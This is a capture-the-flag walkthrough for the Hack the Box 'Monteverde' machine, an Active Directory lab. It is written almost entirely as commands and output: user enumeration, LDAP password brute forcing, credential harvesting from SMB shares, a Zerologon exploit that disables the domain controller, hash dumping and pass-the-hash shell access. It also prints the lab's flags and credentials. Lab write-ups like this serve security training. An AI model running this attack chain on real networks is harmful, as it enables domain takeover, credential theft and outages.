Hack the Box (HTB) – Monteverde

Level: Medium

User Flag

Nmap scan

IP=10.10.10.172
nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 $IP -oA nmap-tcp-allports-${IP}-$(date '+%Y.%m.%d.%Hh%M')
# Nmap 7.92 scan initiated Mon May 30 14:55:55 2022 as: nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 -oA nmap-tcp-allports-10.10.10.172-2022.05.30.14h55 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.026s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-30 19:08:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-30T19:09:28
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required                                                                                                                 
                                                                                                                                                           
Read data files from: /usr/bin/../share/nmap                                                                                                               
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                             
# Nmap done at Mon May 30 15:10:07 2022 -- 1 IP address (1 host up) scanned in 851.70 seconds

We find that port 445/139 for Samba and 389 for LDAP are open.

Enumerate Samba (unauthenticated)

rpcclient -N -U "" $IP
enumdomusers
enumdomgroups
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

Save the user names in a file.

users-rpcclient.txt

Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

Bruteforce user passwords on LDAP

Try username = password.

hydra -L users-rpcclient.txt -P users-rpcclient.txt -t 1 $IP ldap2

We find credentials: SABatchJobs / SABatchJobs

Enumerate Samba (authenticated)

DOMAIN=megabank.local
USER=SABatchJobs
PASS=SABatchJobs
smbclient -L $IP -U "${DOMAIN}/${USER}%${PASS}"

Inspect content from all shares

smbclient \\\\$IP\\ADMIN$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\azure_uploads -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\C$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\E$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\IPC$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\NETLOGON -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\SYSVOL -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\users$ -U "${DOMAIN}/${USER}%${PASS}"

Download content from the users$ share

smbclient \\\\$IP\\users$ -U "${DOMAIN}/${USER}%${PASS}" -Tc users.tar /
tar xvf users.tar
cat mhope/azure.xml

We find credentials: mhope / 4n0therD4y@n0th3r$

Connect with Evil-WinRM

evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i $IP

4961976bd7d8f4eeb2ce3705e2f212f2

Root Flag

Check if the target is vulnerable to Zerologon

crackmapexec smb $IP -u $USER -p $PASS -d megabank.local -M zerologon

The target is vulnerable to Zerologon. Download the code and fix it: Zerologon (CVE-2020-1472).

DC_NAME=monteverde
DC_IP=10.10.10.172

1. Check the DC – usually ~300 attempts, use the NETBIOS name not the FQDN:

python3 49071.py -do check -target $DC_NAME -ip $DC_IP

2. Exploit the DC – this will break the DC until restored:

python3 49071.py -do exploit -target $DC_NAME -ip $DC_IP

3. Dump the DC

For the Domain Admins hashes, this will not contain the machine hex-pass:

impacket-secretsdump -just-dc -no-pass ${DC_NAME}\$@${DC_IP} > secretdump.txt

Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::

4. Dump the DC again

Use the Domain Admins hash to get the machines hex-pass. Look for the LM:NTLM hash of a domain administrator in previous dump. Need to know who is domain admin first (AD enum).

USER=Administrator

DOMAIN=megabank.local
grep $USER secretdump.txt
grep $USER secretdump.txt | cut -d ":" -f3,4
impacket-secretsdump -no-pass -hashes aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea ${DOMAIN}/${USER}@${DC_IP} > secretdump_admin.txt
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea ${DOMAIN}/${USER}@${DC_IP}
cd "C:\Users\Administrator\Desktop"
type root.txt
whoami && hostname && ipconfig /all

12909612d25c8dcf6e5a07d1a804a0bc

cd "C:\Users\mhope\Desktop"
type user.txt
whoami && hostname && ipconfig /all

4961976bd7d8f4eeb2ce3705e2f212f2